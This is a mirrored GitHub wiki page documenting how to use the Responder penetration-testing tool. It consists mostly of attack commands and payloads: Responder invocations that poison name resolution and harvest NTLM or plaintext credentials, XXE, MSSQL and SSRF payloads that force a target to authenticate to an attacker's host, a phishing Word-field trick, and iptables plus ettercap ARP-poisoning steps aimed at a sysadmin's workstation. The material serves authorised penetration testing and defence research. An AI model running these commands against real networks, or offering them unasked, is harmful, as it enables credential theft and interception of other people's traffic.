github/Responder
1
0
Fork 0
mirror of https://github.com/lgandx/Responder.git synced 2024-09-07 16:50:56 -07:00
Code Issues Packages Projects Releases Wiki Activity
Page: Responder Usage
Pages
DHCP Server Home MultiRelay Network traffic analyze mode Poisoning LLMNR NBT NS MDNS Responder Usage Rogue Authentication Servers RunFinger WPAD
3 Responder Usage
lgandx edited this page 2021-04-21 17:42:51 -03:00
Table of Contents

Responder Common Attacks:

Basic usage:

Redirect workstations to Responder HTTP authentication server and grab NTLM credentials:

./Responder.py -I wlp2s0 -rF

Redirect workstations to Responder HTTP authentication server and grab plaintext credentials (this sends a login popup on the victim's workstation):

./Responder.py -I wlp2s0 -rb

Redirect workstations to Responder HTTP Proxy authentication server and grab NTLM credentials:

./Responder.py -I wlp2s0 -rP

Redirect workstations to Responder HTTP Proxy authentication server and grab plaintext credentials (this sends a login popup on the victim's workstation):

./Responder.py -I wlp2s0 -rPb

Redirect workstations to Responder HTTP WPAD proxy and intercept web traffic (Responder will also inject a SMB UNC path to grab credentials transparently):

./Responder.py -I wlp2s0 -rw

Redirect workstations to Responder HTTP WPAD proxy, intercept web traffic and force NTLM authentication:

./Responder.py -I wlp2s0 -rwF

Redirect workstations to an other IP instead of Responder's one:

./Responder.py -I wlp2s0 -re 10.0.0.234

More Advanced attacks

Responder can be used as a poisoner but can also be used as rogue servers when combining with other attacks, these attacks will be documented below.

External Pentest

Responder can be used on an external pentest in the following situation:

  • XXE:

Set your XXE payload this way:

<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://Responder-External-IP/test"> ]>

Watch for any HTTP hashes coming in on your Responder shell.

Another way would be to set a UNC path instead (less reliable since outbound SMB is often blocked):

<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file://Responder-External-IP/test"> ]>

  • MSSQL SQLi:

SQL Injection on MSSQL can lead to NTLMv1/2 hash grab:

xp_dirtree "\\RESPONDER-IP\share";

xp_fileexist '\\RESPONDER-IP\file';

  • SSRF:

Point your SSRF payload to Responder:

http://Responder-External-IP/123.html

  • Phising:

Create a word document and open it:

Hit CTRL + F9 -> IMPORT "\\\\Responder-IP\\123.jpg" -> right click and select "Edit Field" -> tick "Data not stored in document" -> save & close.

When the victim opens the document, an SMB request will be issued to Responder-IP.

Internal Pentest

Responder can be used as a rogue authentication server toolkit when combined with ARP poisoning.

Let's take the example where you know that a sysadmin workstation is located at IP: 192.168.0.153 and you know that this sysadmin is using WinRM to administer servers remotely.

Sysadmin workstation:

192.168.0.153

Switch IP:

192.168.0.254

Let's set an ARP Prerouting attack, and redirect the sysadmin workstation to our rogue WinRM server:

//Block ICMP to prevent outgoing ICMP

iptables -A OUTPUT -p ICMP -j DROP

//Rewrite IP header destination with your IP instead of the original one for all packets going to TCP 5986

iptables -t nat -A PREROUTING -p tcp --dport 5986 -j DNAT --to-destination YOUR-IP:5986

//Enable IP Forward to avoid disruption

echo 1 > /proc/sys/net/ipv4/ip_forward

//Launch the targeted ARP poisoning against 192.168.0.153

ettercap -T -q -w dump-session.pcap -p -M arp:remote /192.168.0.254// /192.168.0.153//